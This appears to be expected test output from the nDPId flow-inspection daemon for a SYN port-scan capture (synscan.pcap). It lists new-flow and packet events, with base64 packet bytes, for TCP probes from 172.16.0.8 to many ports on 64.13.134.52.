+00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1940,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1930,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1092,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1940,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1930,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAsWyIAAC8GvlCsEAAIQA2GNIzSBETdUoMYAAAAAGACEAAkSwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1941,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2103,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1941,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1931,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAsZykAADkGqEmsEAAIQA2GNIzSCDfdUoMYAAAAAGACCAAoWAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1942,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1932,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061312,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061312,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1942,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1932,"flow_packet_id":1,"flow_last_seen":1278275061312,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061312,"pkt":"ACYLMQczACWzv5HuCABFAAAs\/+4AADMGFYSsEAAIQA2GNIzSBBndUoMYAAAAAGACEAAkdgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1943,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1933,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":8800,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1943,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1933,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsxdYAADAGUpysEAAIQA2GNIzSImDdUoMYAAAAAGACBAASLwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1944,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1934,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":9290,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1944,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1934,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsGjIAADgG9kCsEAAIQA2GNIzSJErdUoMYAAAAAGACBAAQRQAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1945,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1935,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49152,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1945,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1935,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAscfUAADIGpH2sEAAIQA2GNIzSwADdUoMYAAAAAGACDABsjgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1946,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1936,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1863,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1946,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1936,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAs8oIAACYGL\/CsEAAIQA2GNIzSB0fdUoMYAAAAAGACDAAlSAAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1947,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1937,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2401,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1947,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1937,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsznsAACkGUPesEAAIQA2GNIzSCWHdUoMYAAAAAGACCAAnLgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1948,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1938,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3031,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1948,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1938,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsFp8AACUGDNSsEAAIQA2GNIzSC9fdUoMYAAAAAGACCAAkuAAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1949,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1939,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":306,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1949,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1939,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAspUsAACUGfiesEAAIQA2GNIzSATLdUoMYAAAAAGACCAAvXQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1950,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1812,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1950,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1940,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsYO4AACkGvoSsEAAIQA2GNIzSBxTdUoMYAAAAAGACCAApewAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1951,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1941,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1104,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1951,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1941,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsubMAADUGWb+sEAAIQA2GNIzSBFDdUoMYAAAAAGACCAAsPwAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1952,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1942,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2718,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1952,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1942,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsfYYAADMGl+ysEAAIQA2GNIzSCp7dUoMYAAAAAGACEAAd8QAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1953,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1943,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1110,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1953,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1943,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAscmYAACoGrAysEAAIQA2GNIzSBFbdUoMYAAAAAGACDAAoOQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1954,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1944,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":6005,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1954,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1944,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsltUAADUGfJ2sEAAIQA2GNIzSF3XdUoMYAAAAAGACCAAZGgAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1955,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1945,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":2034,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1955,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1945,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAskLgAADgGf7qsEAAIQA2GNIzSB\/LdUoMYAAAAAGACBAAsnQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1956,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1946,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5269,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1956,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1946,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsULwAADcGwLasEAAIQA2GNIzSFJXdUoMYAAAAAGACEAAT+gAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1957,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061313,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061313,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":5962,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1957,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1947,"flow_packet_id":1,"flow_last_seen":1278275061313,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061313,"pkt":"ACYLMQczACWzv5HuCABFAAAsuIAAACYGafKsEAAIQA2GNIzSF0rdUoMYAAAAAGACDAAVRQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1958,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1948,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3268,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00463{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1958,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1948,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAsa\/cAACkGs3usEAAIQA2GNIzSDMTdUoMYAAAAAGACCAAjywAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1959,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1949,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":1044,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1959,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1949,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAsYnoAACkGvPisEAAIQA2GNIzSBBTdUoMYAAAAAGACCAAsewAAAgQFtA=="} +00578{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1960,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1950,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1960,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1950,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAs0v0AADYGP3WsEAAIQA2GNIzSAgDdUoMYAAAAAGACDAAqjwAAAgQFtA=="} +00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1961,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1951,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":49157,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1961,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1951,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAsecQAADIGnK6sEAAIQA2GNIzSwAXdUoMYAAAAAGACDABsiQAAAgQFtA=="} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1962,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1952,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061314,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061314,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36050,"dst_port":3261,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1962,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1952,"flow_packet_id":1,"flow_last_seen":1278275061314,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061314,"pkt":"ACYLMQczACWzv5HuCABFAAAss3cAADAGZPusEAAIQA2GNIzSDL3dUoMYAAAAAGACBAAn0gAAAgQFtA=="} +00460{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1963,"source":"synscan.pcap","alias":"nDPId-test","flow_id":40,"flow_packet_id":3,"flow_last_seen":1278275061338,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":24,"thread_ts_msec":1278275061338,"pkt":"ACWzv5HuACYLMQczCABFAAAsAABAADYG0nJADYY0rBAACAAWjNIpZyOl3VKDGWASFtDU2wAAAgQFZAAA"} +00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":1964,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1953,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1278275061357,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1278275061357,"l3_proto":"ip4","src_ip":"172.16.0.8","dst_ip":"64.13.134.52","src_port":36051,"dst_port":6666,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00462{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":1964,"source":"synscan.pcap","alias":"nDPId-test","flow_id":1953,"flow_packet_id":1,"flow_last_seen":1278275061357,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":58,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":58,"pkt_l4_len":24,"thread_ts_msec":1278275061357,"pkt":"ACYLMQczACWzv5HuCABFAAAsgRIAACoGnWCsEAAIQA2GNIzTGgrdU4MZAAAAAGACDAASggAAAgQFtA=="} 